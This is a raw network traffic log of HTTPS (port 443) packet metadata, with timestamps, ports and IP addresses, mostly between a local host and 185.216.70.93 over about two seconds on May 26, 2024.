May 26, 2024 00:17:13.491575003 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.491641998 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.491666079 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.491687059 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.491700888 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.491720915 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.491738081 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.491740942 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.491789103 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.491796017 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.493942976 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.494019032 CEST	443	49737	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.494083881 CEST	49737	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.538429976 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.538455963 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.538525105 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.538912058 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.538949966 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.539005041 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.539575100 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.539581060 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.539637089 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.540138006 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.540144920 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.540191889 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.540613890 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.540618896 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.540668964 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.541187048 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.541829109 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.541841984 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.542356968 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.542368889 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.542761087 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.542773962 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.543142080 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.543154955 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.543662071 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.543670893 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.586496115 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862102032 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862135887 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862148046 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862168074 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862176895 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862185955 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862211943 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.862230062 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.862251997 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.862282038 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.879477978 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.879508018 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.879574060 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.879581928 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.923007965 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.973424911 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.973443985 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.973498106 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.973530054 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.973534107 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.973546982 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.973601103 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.985069990 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.985081911 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.985112906 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.985141993 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.985146999 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.985187054 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.997459888 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.997478962 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.997539997 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:13.997550011 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:13.998100996 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.005954981 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.005995989 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:14.006151915 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.006649017 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.006659985 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:14.080250025 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.080274105 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.080338955 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.080353022 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.080396891 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.088325977 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.088340998 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.088408947 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.088416100 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.088459969 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.095145941 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.095160961 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.095246077 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.095253944 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.095320940 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.100857019 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.100871086 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.100933075 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.100939989 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.101011992 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.104753971 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.104805946 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.104821920 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.104835033 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.104877949 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.106692076 CEST	49738	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.106709003 CEST	443	49738	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.121503115 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.121543884 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.121606112 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.122672081 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.122689009 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.238095999 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.238867998 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.238992929 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.239011049 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.239341974 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.239351034 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.239576101 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.239895105 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.240346909 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.240407944 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.242348909 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.242439032 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.244471073 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.244482040 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.245313883 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.245321035 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.245381117 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.246424913 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.246434927 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.246910095 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.247117043 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.247189045 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.247284889 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.247292995 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.247562885 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.247714996 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.247936964 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.247944117 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.247946024 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.247997046 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.248641014 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.248716116 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.248900890 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.248907089 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.274893999 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.275507927 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.275531054 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.275863886 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.276421070 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.276483059 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.276743889 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.294198990 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.294224024 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.294224024 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.294501066 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.322496891 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.561347961 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.561409950 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.561476946 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.561505079 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.561546087 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.561568022 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.561655045 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.592015028 CEST	49740	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.592036963 CEST	443	49740	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.629477024 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.629502058 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.629566908 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.629586935 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.629699945 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.670510054 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.670530081 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.670536995 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.670597076 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.670624971 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.670636892 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.670681000 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.674237967 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.674308062 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.674329042 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.674366951 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.674367905 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.674401999 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.674405098 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.674417973 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.674420118 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.674448967 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.674464941 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.683135986 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.683162928 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.683218002 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.683226109 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.683253050 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.685048103 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.685096979 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.685105085 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.685153961 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.685163021 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.685178041 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.685221910 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.685245991 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.685271025 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.685278893 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.685287952 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.695441961 CEST	49739	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.695460081 CEST	443	49739	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.702898979 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.702922106 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.702930927 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.702940941 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.702963114 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.702994108 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.703007936 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.703032017 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.703054905 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.704516888 CEST	49743	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.704529047 CEST	443	49743	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.707381010 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.707448959 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.707458019 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.707495928 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.711191893 CEST	49742	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.711196899 CEST	443	49742	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.728543043 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.732284069 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:14.734443903 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.734456062 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:14.735912085 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:14.735975027 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.738542080 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.738696098 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:14.778594017 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.778619051 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:14.785994053 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.786029100 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.786062956 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.786072016 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.786129951 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.786134005 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.786170006 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.789136887 CEST	49741	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.789155006 CEST	443	49741	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.802768946 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.802818060 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.802944899 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.803323030 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.803347111 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.824301958 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:14.884493113 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.886991978 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.887053013 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.888012886 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.888078928 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.888784885 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.888866901 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.889354944 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.889374971 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:14.939280033 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:14.956809044 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:14.956851959 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:14.956928015 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:14.959140062 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:14.959165096 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:15.307390928 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.307481050 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.307568073 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.310759068 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.310853958 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.310935974 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.311655998 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.311693907 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.312410116 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.312442064 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.313092947 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.313113928 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.313175917 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.313740015 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.313764095 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.318991899 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.319017887 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.319025040 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.319037914 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.319044113 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.319046974 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.319093943 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.319123983 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.319139957 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.319175005 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.328537941 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.328572035 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.328605890 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.328613043 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.328643084 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.369005919 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.426824093 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.426835060 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.426851034 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.426891088 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.426914930 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.426943064 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.426963091 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.434421062 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.434442043 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.434495926 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.434521914 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.434530020 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.434560061 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.437958002 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.437978983 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.438019991 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.438036919 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.438055992 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.438075066 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.453574896 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.453665018 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.453741074 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.456264019 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.456305027 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.535342932 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.535383940 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.535434008 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.535520077 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.535563946 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.535587072 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.539395094 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.539408922 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.539484024 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.539500952 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.539594889 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.543315887 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.543329954 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.543395996 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.543411016 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.543467045 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.545926094 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.545942068 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.546003103 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.546016932 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.546207905 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.569008112 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.569330931 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.569372892 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.569720984 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.570147038 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.570235014 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.570338964 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.610534906 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.624908924 CEST	443	49745	185.216.70.93	192.168.2.4
